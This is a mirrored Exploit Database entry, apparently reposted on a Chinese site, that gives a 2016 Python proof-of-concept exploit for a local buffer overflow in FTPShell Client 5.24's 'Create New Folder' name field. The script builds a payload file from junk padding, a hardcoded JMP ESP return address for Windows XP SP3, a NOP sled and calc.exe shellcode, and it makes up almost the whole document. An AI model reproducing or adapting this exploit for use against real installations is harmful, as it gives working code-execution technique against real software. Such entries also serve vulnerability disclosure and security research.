FTPShell Client 5.24 – ‘Create NewFolder’ Local Buffer Overflow

• Exploit Database
• 116 阅读

• 作者： Arash Khazaei
  日期： 2016-02-04
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39417/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45

  #[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] #[+] Exploit Title: FTPShell Client (Add New Folder) Local Buffer Overflow #[+] Date: 2/2/2016 #[+]Exploit Author: Arash Khazaei #[+] Vendor Homepage: www.ftpshell.com #[+]Software Link: http://www.ftpshell.com/download.htm #[+] Version: 5.24 #[+] Tested on: Windows XP Professional SP3 (Version 2002) #[+] CVE : N/A #[+] introduction : Add New Folder In Remote FTP Server And In Name Input Copy Buffer.txt File content #[+] or click on Remote Tab Then Click On Create Folder And Copy Buffer.txt In Name Input ... #[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]   #!/usr/bin/python filename = "buffer.txt" # Junk A junk = "A"*452 #77FAB277JMP ESP # Windows Xp Professional Version 2002 Service Pack 3 eip = "\x77\xB2\xFA\x77" # Nops nops = "\x90"*100 # Shellcode Calc.exe 16Byte buf=("\x31\xC9" "\x51" "\x68\x63\x61\x6C\x63" "\x54" "\xB8\xC7\x93\xC2\x77" "\xFF\xD0")   #Appending Buffers Together exploit = junk + eip + nops + buf #Creating File length = len(exploit) print "[+]File name: [%s]\n" % filename print "[+]Payload Size: [%s]\n " % length print "[+]File Created.\n" file = open(filename,"w") file.write(exploit) file.close print exploit     #[+] Very Special Tnx To My Best Friends: TheNonexistent,Nirex,Pr0t3ctor